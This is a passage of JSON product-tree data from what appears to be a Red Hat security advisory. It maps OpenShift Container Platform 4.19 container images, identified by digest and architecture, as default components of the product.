"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x"
},
